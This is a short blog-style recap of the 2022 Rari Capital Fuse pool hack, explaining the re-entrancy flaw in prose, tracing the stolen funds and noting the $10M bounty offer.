Top 2022 Crypto Hacks: Rari Fuse Exploit

On April 30th, a significant exploit was used to drain $80M worth of Ethereum and Arbitrum from seven Fuse pools belonging to Rari Capital.

The attack is believed to have been enabled by a vulnerability in the Comptroller contract that allowed malicious actors to withdraw collateral without incurring any debt. This article will explore how this exploit worked and why it succeeded.

The vulnerability exploited in the Rari Capital incident is related to re-entrancy, which occurs when a function can be called multiple times within one transaction. In this case, the attacker used flash loans and call.value functions to call exitMarket in order for them to withdraw collateral whilst keeping their borrowed ETH. This process bypassed all checks as they were made after the transfer due Compound code not following the check-effect-interaction pattern. As such, no debt was recorded before the collateral could be withdrawn, resulting in Rari Capital losing out on $80M worth of assets.

The malicious hacker address (the red node) deployed two attack contracts (the yellow nodes) which initiated a large-scale fund transfer on the day of the incident. A total of 26,500 ETH was sent to, while the remaining 1,570 ETH remain stored in the main hacker address even until today.

RARI exploit transfers
RARI exploit transfers

To retrieve the stolen funds, Rari Capital announced a $10M bounty reward for any hacker to return the funds.